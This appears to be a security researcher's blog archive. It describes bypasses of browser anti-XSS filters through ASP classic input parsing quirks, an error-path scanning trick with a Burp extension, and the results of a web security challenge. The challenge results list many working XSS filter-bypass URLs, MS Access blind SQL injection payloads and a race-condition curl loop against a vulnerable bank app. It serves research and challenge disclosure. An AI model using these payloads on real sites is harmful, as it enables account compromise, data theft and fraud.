Currently is out of sync

This blog is currently out of sync with http://soroush.secproject.com/blog/ 

Please refer to the main blog to see the updates.

If you cannot see the main blog, you have to use a proxy or a secure VPN.

Browsers Anti-XSS methods in ASP (classic) have been defeated!

Download Link: http://soroush.secproject.com/downloadable/Browsers_Anti-XSS_methods_in_ASP_(classic)_have_been_defeated.pdf

Browsers Anti-XSS methods in ASP (classic) have been defeated!

This time, I want to start with the summary section first to break the rules!

Summary

The intention of this paper is to prove the client-side XSS protection methods must have rules for different web application languages, otherwise they will be bypassed. This research is based on ASP classic web applications, but it can be performed in other web application languages as well.

Introduction

I researched different methods of sending inputs to an ASP (classic) page. I found out that almost all of the browsers’ Anti-XSS protection methods are not aware of different features of ASP that accept the inputs; therefore, all of them can be bypassed.

Note: NoScript has already added all of these rules to its application and it is more secure than the others currently (thanks to Giorgio Maone for patching the application as quickly as possible). IE9 has better sense about ASP than Google Chrome, but it does not still have all the rules.

Description

In order to make you more interested, I will start with two examples:

Example 1: Do you think Anti-XSS methods should detect this easy XSS attack?

http://www.sdl.me/xssdemo/getxss.asp?input1=<script/&&input1=FOOBAR&input1=>alert('@IRSDL');</script>

Please try it in IE8/9/10 and Google Chrome to see the result.

Example 2: What about this?

http://www.sdl.me/xssdemo/getxss.asp?input1=<script/&in%u2119ut1=>al%u0117rt('@IRSDL')</script/

Example 3: Or, sometimes, the bypass can be complicated! This is how I solved my XSS1 and XSS2 questions with a single solution in SecProject.com Challenge Series 1:

http://sdl.me/challenge1/xss1/JsChallenge1.asp?I%%NPUT2=Somet%%hing&iN%%PUT2=')1&inP%%UT2%00%00=1};lt=1;1&In%u2119ut2=1%26<1&input2=0<ale%%rt(/AWESOME_IRSDL/&in%u2119U%%T2%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&I%%n%%PuT2%00%00%00=1/%%*%%/&iN%%p%%Ut2=1/%%/

And

http://sdl.me/challenge1/xss2/JsChallenge2.asp?I%%NPUT1=Somet%%hing&iN%%PUT1=')1&inP%%UT1%00%00=1};lt=1;1&In%u2119ut1=1%26<1&input1=0<ale%%rt(/AWESOME_IRSDL/&in%u2119U%%T1%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%1%00=1;i%%f(0&in%u2119ut1%%=1){{1&I%%n%%PuT1%00%00%00=1/%%*%%/&iN%%p%%Ut1=1/%%/

As you see, I am only using 1 input parameter to bypass everything! (Note: this special page in xss1 converts “<” and “>” to “&lt;” and “&gt;” which was used to bypass NoScript as well – it is not a NoScript bug)

Why can you bypass XSS protections? I will tell you now.

Interesting ASP Input Features

1- HTTP Parameter Pollution (HPP): ASP is one of the web application languages which can receive several inputs with one single name. Although this feature was/is used legitimately in some of the web applications, it can be useful for attackers to bypass some restrictions as well [1].

2- Certain UTF-8 characters will be transformed to their ASCII equivalents [2], [3]. It can be used in both of parameter names and their values. Therefore, “inPut1=<scriPt/>” is equal to “%u0131n%u2119ut1=%u3008scr%u0131%u2119t>”

3- Parameter names in ASP are not case sensitive. Therefore, “input1” is equal to “InPuT1”.

4- Anything after the Null character will be ignored in parameter names and their values. Therefore, “input1=test” is equal to “input1%00Something=test%00Anything”

5- Percentage characters (“%”) will be ignored when there is no Hex value after them in parameter names and their values. Therefore, “input1=test” is equal to “%input1%=t%%est%”

6- When a parameter name after the ampersand character (“&”) is not followed by an equal sign (“=”), ASP does not count it as a separate input. As a result, in “?&input1=test” the parameter name is “&input1”; or, in “?&input1&input1=test” the parameter name is “&input1&input1”.

Bypassing browsers Anti-XSS protections

Now we know many different interesting features of ASP. We can mix these features together to bypass the browsers protections which do not understand these rules. Please see the above examples again to identify the feature types which have been used.

Note 1: URL Encoding can be used in ASP to obfuscate the attack.

Note 2: Many UTF-8 vectors such as “%u1111” will be translated to “?” in ASP which can be used in JavaScript.

Note 3: Normally, a UTF-8 encoded string should have a lowercase “u”. Therefore, “%u0041” (which is “A”) is not equal to “%U0041” (which is “U0041”). However, sometimes server configurations can make these equal!

Note 4: If you have more than 1 input (multi-injection), reordering the input parameters may bypass the protections (input disorder method [4]).

Finally

Please let me know via twitter or email if you know or have found any other interesting features.

This research was based on ASP classic language. However, other languages such as PHP can be studied in the same way; for example, PHP ignores spaces before the parameter names and anything after the “[]” or a null character (“%00”) in the parameter names, or in PHP, space, dot, and a lone square-bracket characters (“ .[”) in parameter names will be converted to an underscore character (“_”).

References

[1] HTTP Parameter Pollution, URL: https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf

[2] NoScript New Bypass Method by Unicode in ASP, URL: http://soroush.secproject.com/blog/2010/08/noscript-new-bypass-method-by-unicode-in-asp/

[3] Lost in Translation (ASP’s HomoXSSuality), URL: http://hackademix.net/2010/08/17/lost-in-translation-asps-homoxssuality/

[4] SecProject Web AppSec Challenge Series 1 Results, URL: http://soroush.secproject.com/blog/2012/06/challenge-series-1-result-and-conclusion/

 

Download Link: http://soroush.secproject.com/downloadable/Browsers_Anti-XSS_methods_in_ASP_(classic)_have_been_defeated.pdf

“ASPXErrorPath in URL” Technique in Scanning a .Net Web Application

For a long time that I have been using a simple technique whenever I scan a black-box .Net web application. Many of you may already know about this, but I could not find anything in writing and that is why I have decided to write about it and document it.

 

This is the scenario:

We have a .Net web application which redirects you to an error page whenever there is any error. The header and body of the responses from the server are exactly the same when the page is not there or there is an error in the page. And, we are interested to distinguish 404 (page not found error) and 500 (internal error) error codes from each other.

Here is an example:

1- The following file is available on the server:

http://www.sdl.me/PoCs/validfile.aspx

Note: It has an error when you do not provide its input (?input=1)

2- The following file is not available on the server:

http://www.sdl.me/PoCs/invalidfile.aspx

 

As there are some errors in both of these links, we are redirected to “http://www.sdl.me/pocs/error.html”.

Now, how can we detect which one is really on the server and what is the actual status code?

 

My Solution:

It is possible to add a “?aspxerrorpath=/” to both of these URLs to see the actual error. It is not still possible to see the source of error, but it will help us to make the crawling results more accurate.

Therefore, we would have:

1- http://www.sdl.me/PoCs/validfile.aspx?aspxerrorpath=/

2- http://www.sdl.me/PoCs/invalidfile.aspx?aspxerrorpath=/

 

Automated Scanners:

Web application security scanners such as Acunetix or Burp Suite Pro can also use this feature (bug?) for the .Net applications.

I have created a Burp Suite Extension as an example that will add “?aspxerrorpath=/” to the “.aspx” files in the scope:
[java]
/*
* File Name: BurpExtender.java
* Author: Soroush Dalili – @irsdl
* Weblog: http://soroush.secproject.com/blog/
* Date: 11 June 2012
* Description: Quick extension for the "ASPXErrorPath in URL" technique
* More Information: http://soroush.secproject.com/blog/2012/06/aspxerrorpath-in-url-technique-in-scanning-a-net-web-application/
*/

package burp;
import java.io.UnsupportedEncodingException;
import java.net.URL;

public class BurpExtender
{
public burp.IBurpExtenderCallbacks mCallbacks; // I will use this to keep the callbacks
public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
{
mCallbacks = callbacks;
}
public void processHttpMessage(
String toolName,
boolean messageIsRequest,
IHttpRequestResponse messageInfo)
{

if (messageIsRequest){
try
{
URL uUrl = messageInfo.getUrl();
if (mCallbacks.isInScope(uUrl) && uUrl.getFile()!=null)
{
if(uUrl.getFile().matches("(?im).*\.as[\w]x$"))
{
String[] requestHeaderAndBody = {"",""};
String finalRequestHeaderAndBody;
requestHeaderAndBody = getHeaderAndBody(messageInfo.getRequest());
requestHeaderAndBody[0] = requestHeaderAndBody[0].replaceAll("\.aspx[\?]*", ".aspx?aspxerrorpath=/&");
finalRequestHeaderAndBody = requestHeaderAndBody[0]+"rnrn"+requestHeaderAndBody[1];
messageInfo.setRequest(finalRequestHeaderAndBody.getBytes("UTF-8"));
}
}
}
catch (Exception e)
{
e.printStackTrace();
}
}

}

// Split header and body of a request or response
private String[] getHeaderAndBody(byte[] fullMessage) throws UnsupportedEncodingException{
String[] result = {"",""};
String strFullMessage = "";
if(fullMessage != null){
// splitting the message to retrieve the header and the body
strFullMessage = new String(fullMessage,"UTF-8");
if(strFullMessage.contains("rnrn"))
result = strFullMessage.split("rnrn",2);
}
return result;
}

}
[/java]

 

Recommendation for the developers/website administrators:

In order to stop penetration testers to use this technique, you need to stop or rewrite any web request which has “aspxerrorpath” parameter and its destination is not the default error page.

For example, in IIS7 (when your error page is “error.aspx”) we can use the following “web.config”:
[xml]
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="error.aspx" />
</system.web>
<system.webServer>
<rewrite>
<rules>
<rule name="Query String Rewrite">
<match url=".*.as[w]x" />
<conditions>
<add input="{QUERY_STRING}" pattern=".*aspxerrorpath=.*"
negate="false" />
<add input="{REQUEST_FILENAME}" pattern="error.aspx" negate="true" />
</conditions>
<action type="Redirect" url="error.aspx" appendQueryString="true" />
</rule>
</rules>
</rewrite>
</system.webServer>
</configuration>
[/xml]

For more information about IIS7 URL Rewrite please visit: “http://learn.iis.net/page.aspx/664/using-url-rewrite-module-20/”

SecProject Web AppSec Challenge Series 1 Results

I am going to have a quick write up about the questions to publish all the amazing vectors. But first, thanks to those highly skilled web application security researchers who attended my challenge series­1.

You can find these awesome contestants + their results in the Hall of Fame page.

Note about Anti-XSS bypasses: NoScript has already patched all of the issues. IE9 and Google Chrome still do not have a good protection against the multi-input XSS.

XSS1 and XSS2:

Multi-injected inputs in JavaScript with duality: These two questions were very similar. In fact, they could have the same answer with a little change.

Instead of using all three inputs, some contestants solved them just by using two inputs. I think using two inputs even made it easier!

XSS technique without parentheses from Gareth Heyes also was used in several solutions (http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/).

Some of the vectors could bypass the protections by changing the input orders (I call it “input disorder” method) (for example, “input2” before “input1”).

No one solved XSS1 and XSS2 by using only 1 input and HPP (it was not part of the challenge to be fair); however, it is possible to solve these questions only by using 1 input and bypass all the browsers protections. You can define this as a self-challenge for yourself.

None of the contestants used homo-characters in ASP to bypass the protections (http://soroush.secproject.com/blog/2010/08/noscript-new-bypass-method-by-unicode-in-asp/ , http://hackademix.net/2010/08/17/lost-in-translation-asps-homoxssuality/). This also was not part of the challenge, but it was possible.

Results:

1- There was not a single solution that could bypass IE9 but not Google Chrome at the same time.

2- Based on the solutions that I had received, all the contestants could at least bypass Google Chrome in the first try (except Firefox without having any protection obviously). Therefore, Google Chrome is an easy target for this kind of XSS vulnerability when you can control multiple inputs.

3- NoScript was very tough target and it became harder and harder during the challenge as Giorgio Maone was constantly patching the issues. Most of the NoScript bypasses were patched in several hours only. Thanks to Giorgio for his support and providing us the best Anti-XSS solution which we can currently use and rely on. Please report any vector that still bypasses NoScript to Giorgio to help him to make it more secure.

Vectors: Google Chrome bypass only:

Some of these could bypass NoScript.

@kkotowicz (+NoScript, 2 inputs):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=&input2=%27%29a}alert%28%27@kkotowicz%27%29;function%20b%28%29{if%28/*&input3=*/%27//

@kkotowicz (Gareth Heyes Method, -Firefox, 2 inputs):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=one%22%2b'//&input2='%2F*&input3=*%2F)){a}}%3Bonerror%3deval%3B;throw%22=alertx28%22kkotowicz%22x29%22;{if(%22 

@kkotowicz (Gareth Heyes Method):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=one"%2b'//&input2='%2F*&input3=*%2F)){a}}%3Bonerror%3dprompt%3B;throw""kkotowicz"";{if("

@kkotowicz (Gareth Heyes Method, +NoScript, 2 inputs):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=one%22%2b%27//&input2=%27%2F*&inpui3=*%2F%29%29{}}%3B;onerror=window[%22al%22%2b%22ert%22];%22%22[%22@kkotowicz%22].kkotowicz;;{if%28%22 

@superevr (2 inputs):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=test1&input2=2'){}}%20try{/*&input3=1*///'}finally{(0)['constructor']['constructor']('x61lertx28/superevr/)')()};{{//

@superevr (+NoScript, 2 inputs):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=test1&input2=2'){}}%20try{/*&input3=1*///'}finally{(0)['constructor']['constructor']('x61lertx28/superevr/)')()};{{//

@superevr (only 1 input):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=something&input2=test1&input3=*///')){}};alert(1);{{/*'

@superevr (+NoScript):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=test1&input2=2')){}}%20try{/*&input3=1*///')}finally{(0)['constructor']['constructor']('x61lertx28/superevr/)')()};{{//

@peterjaric (input disorder?):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input2=a%27%29%29;}alert%28%%27Peter%20JariJ%27%29;{{/*&input3=b%27%29;//*///%28%27&input1=/*%27//

@peterjaric (2 inputs):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=a&input2=%27%29;}alert%28%27Peter%20Jaric%27%29;{{/*&input3=*///

@yousukezan:

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=*//*&input2=%27%29;}alert%28%27yousuyousu%27%29;function%20f%28%29{{/*Something&input3=SomethingElse*///

@TheWildcat (+NoScript, Input disorder?):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input3=%2a%2f%20%26%26%20%61%31%2e%72%65%70%6c%61%63%65%28%2f%2e%2a%2f%67%2c%61%6c%65%72%74%29%20%7c%7c%20%27%3b%7d%7d%73%65%74%69%64%28%29%3b%7b%7b%2f%2f&input1=%27%29%2c%61%31%3d%22%74%68%65%77%69%6c%64%63%61%74%22%2c%28%27&input2=%79%79%79%27%2f%2a

@yousukezan (2 inputs):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=something//&input2=test1&input3=*///'));}alert('yousukezan');function%20f(){{/*

@yousukezan (+NoScript, Only 1 input!):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input3=*///%27%29%29;}alert%28%27yousukezan%27%29;{{/*

@skeptic_fx (+NoScript, 2 inputs):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=one&input2=100%27%29{}}alert%28/skeptic_fx/%29;/*&input3=three%27;{{//*///

@skeptic_fx (+NoScript, 2 inputs):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=one&input3=')//*/{{//&input2=test1').value){}}alert(/skeptic_fx/);/*

@avlidienbrunn (2 inputs):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=test1&input2=something'){}%0a}%0aalert(/avlidienbrunn/.source);/*&input3=*/function%20die(){if(1==1){//

IE9 & Google Chrome:

@kkotowicz (Gareth Heyes Method):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=&input2=))a};alert('kkotowicz');;/*&input3=)%2b'*/{{//'//

@kkotowicz (IE9 only?, good obfuscation technique):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=one%22%2b%27//&input2=%27%2F*&input3=*/)){}};%2b{valueOf:location,toString:[].join,0:"javx61script:alertx28"kkotowicz")",length:1};;;//');{{1//

@kkotowicz (IE9 only?, good obfuscation technique):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=&input2=))a};%2b{valueOf:location,toString:[].join,0:"javx61script:alertx28"kkotowicz")",length:1};;/*&input3=)%2b'*/{{//'//

@kkotowicz:

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=&input2=))a};alert('kkotowicz');;/*&input3=)%2b'*/{{//'//

@kkotowicz (Input disorder):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input3=*/)){}};alert("kkotowicz");;;//');{{1//&input1=one%22%2b%27//&input2=%27%2F*

@shafigullin:

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=/*%20%20*/%20/*&input2=%27%29%29%0A1};{y:{x:/*&input3=*/%20alert%28%22@shafigullin%22%29%20//%20%27%29//

@shafigullin:

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=*/ //'));1 /*&input2=*/; alert("@shafigullin"); /*&input3=*/;self.close=setid;if(true){{x:1/*

@kinugawamasato (very interesting cross site technique, +NoScript):

[html]
http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=&input2=%29%29location.href=name/*&input3=%29;function%20a%28%29//*/;function%20b%28%29//
<pre>
<script type="text/javascript">// <![CDATA[
document.getElementById('x').contentWindow.name="javascript:alert('Masato Kinugawa')";
// ]]></script>
[/html]

@kinugawamasato (very interesting cross site technique, +NoScript):
[html]
http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=))location.href=name;function%20a()function%20b()/*/%27&input2=&input3=id=
<pre>
<script type="text/javascript">// <![CDATA[
document.getElementById('x').contentWindow.name="javascript:alert('Masato Kinugawa')";
// ]]></script>
[/html]

@TheWildcat (Input disorder):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=%27%29%2c%28%27&input3=%2a%2f%61%6c%65%72%74%28%22%74%68%65%77%69%6c%64%63%61%74%22%29%3b%20%7b%7b%20%2f%2f&input2=%74%65%73%74%27%29%3b%7d%2f%2a

@TheWildcat (Input disorder, +NoScript):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input2=%27%29%29%3b%2f%2a&input3=%2a%2f%7d%61%6c%65%72%74%28%22%74%68%65%77%69%6c%64%63%61%74%22%29%3b%20%7b%7b%2f%2f

@abysssec (2 inputs):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=test1&input2=')/*&input3=*/;}t();function t(){alert(/Milad/);{//

@abysssec (2 inputs):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input2=test1&input2='))/*&input3=*/alert(0);}t();function t(){alert(/Milad/);{//

@avlidienbrunn (2 inputs):

http://sdl.me/challenge1/xss2/JsChallenge2.asp?input1=AAAA&input2=aa')==null){+}%0A/*&input3=*/}+alert(/avlidienbrunn/.source);+function+die(){if(1==1){//

@avlidienbrunn (2 inputs):

http://sdl.me/challenge1/xss1/JsChallenge1.asp?input1=test1&input2=something')%7B%7D%0a/*&input3=*/}alert(/avlidienbrunn/.source);function+x(){if(1==1){//

@superevr (Gareth Heyes Method + Forcing IE9 to use standard mode, 2 inputs):

http://nevr.co.cc/imp.php?nofil&amp;plain_xss=&lt;!DOCTYPE html&gt;<a href="http://sdl.me/challenge1/xss1/JsChallenge1.asp%3finput1=test1%26input2=2&#039;)%20try/*%26input3=1*///&#039;finallyonerror=alert;throwdocument.domain://">http://sdl.me/challenge1/xss1/JsChallenge1.asp%3finput1=test1%26input2=2&#039;)%20try/*%26input3=1*///&#039;finallyonerror=alert;throwdocument.domain://</a>

@superevr (Gareth Heyes Method + Forcing IE9 to use standard mode, 2 inputs):

http://nevr.co.cc/imp.php?nofil&amp;plain_xss=&lt;!DOCTYPE html&gt;<a href="http://http%3A%2f%2fsdl.me%2fchallenge1%2fxss2%2fJsChallenge2.asp%3Finput1%3Dtest1%26input2%3D2%27%29%29%7B%7D%7D%20try%7B%2f%2a%26input3%3D1%2a%2f%2f%2f%27%29%7Dfinally%7Bonerror%3Dalert%3Bthrow%20%27superevr%27%7D%3B%7B%7B%2f%2f">http://http%3A%2f%2fsdl.me%2fchallenge1%2fxss2%2fJsChallenge2.asp%3Finput1%3Dtest1%26input2%3D2%27%29%29%7B%7D%7D%20try%7B%2f%2a%26input3%3D1%2a%2f%2f%2f%27%29%7Dfinally%7Bonerror%3Dalert%3Bthrow%20%27superevr%27%7D%3B%7B%7B%2f%2f</a>

XSS3:

I wanted to implement this in a way that you had to use HPP or other techniques in ASP to receive all the points. However, as you may know, its implementation went wrong and made it really impossible to be exploited in most of the browsers. You can still try to see if you can break it in Mozilla Firefox for example, I couldn’t.

Results:

This question is still exploitable in Internet Explorer by using the Conditional Comments in JavaScript (http://en.wikipedia.org/wiki/Conditional_comment).

Exploit/Vectors:

@kinugawamasato (IE9 bypassed by me [@irsdl] by using homo-characters technique in the parameter name – will be explained in another blog post):

http://sdl.me/challenge1/xss3/JsChallenge3.asp?Input1=*/alert%28%22@kinugawamasato%20and%20@irsdl%22%29;{{//%20@end%20@*//*%27%29%29;};{1&in%u2119ut1=1}/*@cc_on%20@if%281%291;@else

@avlidienbrunn (IE9 cannot simply detect this!):

http://sdl.me/challenge1/xss3/JsChallenge3.asp?input1=@end+function+x(){if(1==1){+//*/+alert(/avlidienbrunn/.source);+@if(!1)')==null){}}/*

SQL Injection:

The first part of this question was a blind sql injection. The second part was a bit trickier as it was a MS Access database; you had to write your query in a way to run differently in the second execution of the Query. Free space character (“ ”) was also filtered and you had to use something else.

Anyone who could solve the second part, automatically had the answer of the first part as well. However, all the contestants solved the both parts separately.

Results:

The free space character could be replaced by Tab character (“%09”), Line Feed (“%0A”), Carriage Return (“%0D”), and a plus sign (“%2B”). Moreover, the following characters in UTF-8 can be used in ASP to do the same thing:

%u 2556, %u 2510, %u 253c, %u 256c, %u 256b, %u 256a, %u 251c, %u 2518, %u 250c, %u 2514, %u 255d, %u 255a, %u 2553, %u 2555, %u ff0b, %u 255c, %u 255b, %u 2557, %u 2559, %u 2554, %u 2552, %u 2558

.

The first part could be exploited by using the normal method of blind SQL injection. As you already had the sample database and the source code, it could be done easily.

For the second part, there were three kinds of solution:

1- (The easiest) using the terminator character for MS Access and change the sorting order:

First query:

[php]Set rs1 = oConnection.execute("select username,permission from users where id=" & input_id & " Order by id")[/php]

Second Query:

[php]set rs2 = oConnection.execute("select username,password,permission from users where id=" & input_id & " Order by id")[/php]

You can see that in the 2nd query, we have selected the “password” field in the second field which was not in the first query. Therefore, if we could order them by using the second field, we could solve this section. Second field in the first query is “permission” and in the second query is “password”. However, as the queries already have the “Order by” part, we have to truncate the query. According to “https://www.owasp.org/index.php/Testing_for_MS_Access”, we can use the “%16” character to truncate the query. Note that null character “%00” cannot be used as it will terminate the text in ASP (before going to the query).

2- Using a time function with an IF condition in MS-Access:

As you may not be able to get the milliseconds in MS-Access, you need to create a delay between the first and the second queries.

3- Using a random number generator function with an IF condition in MS-Access:

Random number generator in MS-Access is a bit tricky as it can generate the same sequence of numbers whenever you run the application. However, you can use this feature (bug?) to have a stable exploit.

Exploits/Vectors – Blind SQLi:

@LightOS:

http://sdl.me/challenge1/sqli/exploitme.asp?id=IIF%28%28select%0ATOP%0A1%0Amid%28passworp,1,1%29%0Afrom%0Ausers%0Awhere%0Aid=8%29=chr%2874%29,1,2%29

@kkotowicz:

http://sdl.me/challenge1/sqli/exploitme.asp?id=3%09UNION%09SELECT%09ALL%09top%091%09papasswo,'111'%09from%09users%09where%09id%3d8%16

@spectresearch:

http://0me.me/files/soroush.secproject.com/mdb_blind.py

@avlidienbrunn:

http://sdl.me/challenge1/sqli/exploitme.asp?id=(-1)UNION%0ASELECT%0Ausername,password%0AFROM%0Ausers%0AWHERE%0Ausername='admin'%16

@abysssec:

http://0me.me/files/soroush.secproject.com/MS-Access.py

@yousukezan:

http://sdl.me/challenge1/sqli/exploitme.asp?id=8%09and%09password%09like%09%27owasome![!-/][!-/]%27

Exploits/Vectors – Reading the Secret:

- Using ordering trick:    

@kkotowicz:

http://sdl.me/challenge1/sqli/exploitme.asp?id=1%09or%09id%3d8%09order%09by%092%09desc,1%16

@abysssec:

http://sdl.me/challenge1/sqli/exploitme.asp?id=1%0aor%0a1=1%0aorder%0aby%0a2%0adesc,id%16

@LightOS:

http://sdl.me/challenge1/sqli/exploitme.asp?id=id%0dand%0did%0d%0din(1,8)%0dorder%0dby%0d2%0dDESC%16

- Using time functions:

@spectresearch:

http://0me.me/files/soroush.secproject.com/get_secret_area.py

@TheWildcat:

http://sdl.me/challenge1/sqli/exploitme.asp?id=IIf(Second(now())%09Between%0933%09And%0934,1,8)%09and%09(SELECT%09count(*)%09FROM%09users%09AS%0920T1,%09users%09AS%09T2,%09users%09AS%09T3,%09users%09AS%09T4,%09users%09AS%09T5,%09users%09AS%09T6)%09NOT%09IN%09(1,2)

- Using random number generator:

@peterjaric:

http://sdl.me/challenge1/sqli/exploitme.asp?id=iif%28Int%281.7*Rnd%29,1,8%29

Vulnerable Bank Application:

It was a classic question about a vulnerable bank application. However, in here it was not vulnerable to a XSS or a SQL Injection, and you still had to increase your money. This is the current vulnerability of several web applications which do not have any protections against Race Condition issues.

Results:

The problem that we had in this application was a race condition issue when it was getting the current amount and decreasing and increasing money in the database. You could increase your money basically be sending a lot of requests at the same time to transfer money from one account into another (the best exploitation technique is when you transfer money from one account into the other accounts at the same time [classic to saving and ISA in this example]). Even if I did not have any delay in the application it was still exploitable! Using Transactions (http://www.w3schools.com/ado/met_conn_begintrans.asp) could save this bank, but it could lead to a denial of service at the same time. The solution of this problem should be implemented really carefully to not lead to a dead-lock.

Exploits:

@peterjaric (Simple Explanation):

(1) newBalanceDEC = cDbl(GetAmount(userID, fromacc) - amount)
(2) oConnection.execute("update accounts set " & fromacc & "="&newBalanceDEC&" where [enabled]=1 AND ID="&userID&"")
(3) newBalanceINC = cDbl(GetAmount(userID, toacc) + amount)
(4) oConnection.execute("update accounts set " & toacc & "="&newBalanceINC&" where [enabled]=1 AND ID="&userID&"")
There is no concept of thread safety in this code, so what could happen if two request to transfer money between the same two accounts would come in at the same time? There is no guarantee that one request (call it 'A') would run first and then the other (call it 'B'). They might get interleaved like for example this (assuming transfer of 1 from Classic account with 100 to Savings with 0):
A1 newBalanceDEC = 99
B1 newBalanceDEC = 99
A2 Classic = 99
B2 Classic = 99
A3 newBalanceINC = 1
A4 Saving = 1
B3 newBalanceINC = 2
B4 Saving = 2

@peterjaric (Simple Exploit):

$ alias doit='curl http://localhost:9000/vulnbankapp/transfermoney.asp -d "userID=36&fromacc=1&toacc=2&amount=1&password=123456"'

$ doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit & doit …

@kkotowicz:

http://0me.me/files/soroush.secproject.com/bank-App.py

Exploitation Video by using Burp Suite Pro.:

http://www.youtube-nocookie.com/v/R3B3JaaYpbI?version=3&hl=en_US&rel=0

Burp Suite Beautifier Extension

I have updated my project section with a small project “Burp Suite Beautifier Extension”: http://soroush.secproject.com/blog/projects/burp-suite-beautifier/
Please let me know your opinion if you have used it. You can always send me your messages via Twitter “@irsdl”

SecProject Web AppSec Challenge – Series 1

There are 5 web application security questions that have been set as a challenge. You will receive points based on your solutions (please see the Pointing System). The deadline for this challenge is end of May 2012.
You can use your twitter ID to be followed by other people who follow this challenge. You can also send me a link to your blog/website/twitter to be linked in the table.
Please send your solutions with the subject: “SecProject Web AppSec Chal1 – Your Name” to sdalilimail-challenge1 [at] yahoo [d0t] com. Please do not send the solutions to any other email address.

Hall of Fame:

There is a direct link to Hall of Fame accessible via Project menu:

Click here to see Hall of Fame

 (http://soroush.secproject.com/blog/projects/hall-of-fame-challenge-series-1/)

Deadline: 1st of June – 24:00 GMT

 

The rules are as follows:

General Rules:

1- Identical answers will be counted only for the first reporter.
2- Please do not use automated tools on the targets as they can lead to a denial of service for other contestants.
3- Please do not publish your answers till the deadline. Thanks in advance.

XSS Rule(s):

You need to “alert” your name on the screen. You are not allowed to create a new HTML tag.
Note: it is ASP!…

SQL Injection Rule(s):

You need to exploit the provided sample website to: 1- read the admin password and 2- achieve the secret text which means you have reached the forbidden area successfully.
I think you need to take a look at the source code for this one! The database is a MS Access database which makes it more challenging.

Vuln Bank Application Rule(s):

You need to increase your total money to more than 100.
You have the source code (ASP VBScript) to be able to try this vulnerable bank application offline. (“resetall.asp” is just for debugging purposes)

Questions are as follows:

Download links are as follows:

- http://Soroush.secproject.com/downloadable/secproject.com-challenge1.zip
- http://sdl.me/challenge1/secproject.com-challenge1.zip

XSS1:

Test Target = http://sdl.me/challenge1/xss1/JsChallenge1.asp

XSS2:

Test Target = http://sdl.me/challenge1/xss2/JsChallenge2.asp

XSS3:

Test Target = http://sdl.me/challenge1/xss3/JsChallenge3.asp

SQL Injection:

Test Target = http://sdl.me/challenge1/sqli/

Vuln Bank Application:

Test Target = http://webapsecchall01.brinkster.net/vulnbankapp4543334/ [currently does not work due to the hosting problem - please run it locally for your testing]
Note: A fresh target will be provided for you if you can explain the vulnerability correctly and you want to exploit it.

Goals and Pointing System:

XSS Points (Max 60 Points – Per Each):

Mozilla Firefox 12.0 without NoScript: +5 Points
IE9 Anti-XSS Bypass: +15 Points
Latest Chrome Anti-XSS Bypass: +10 Points
IE9 & Chrome at the same time with 1 link: +5 Points
NoScript Bypass: +25 Points
Note: In order to get the points, you need to send me the link(s) that will lead to an “alert” message by opening it. If you are using any specific encoding/packing that make your inputs unreadable, you need to explain your method briefly. If each link is related to a specific browser, please mention that as well next to it.

Amendment (new): XSS3 now has double points (120 points in total) due to a problem in its implementation which made it extremely hard. 

SQL Injection Point (Max 60 Points):

Reading the admin password: 20 Points
Running the code in the critical area of the code and achieving the secret code: 40 Points
Note: In order to get the points, you need to send me the link(s) that can perform the attack along with its explanation.

Virtual Bank Application Point (Max 60 Points):

Correct Explanation: 20 Points
Exploitation on a Custom Website: 40 Points
Note: In order to get the points, please send your explanation in English. If you think it is easier for you to send me a video link for this exploit, you can also add that to your explanation. Please tell me if you want to exploit the vulnerability on a sample link, then I can send you the relevant link if your explanation was correct.

History of These Questions:

This challenge is based on real and interesting issues that I have seen during my web application testing. I thought it can be good to share some of them with you to challenge your skills. The XSS issues came from an issue in Yahoo.com website two years ago which has been fixed now. The SQL Injection issue was inside a popular web application which I cannot announce its name and you may already know it; and the last issue is a general vulnerability of many web applications.
I have added some spice to the questions to make them even more interesting. All of these issues are exploitable (XSS3 has not been tested previously), but you need to be initiative to get more points.

 

Thanks to: Mario Heiderich, Ben Sheppard, and Gareth Heyes for their comments on this challenge. As they do not have the answers, they can still attend this challenge!

Sometimes no Ninja skill is required to receive money from security bug bounty programs!

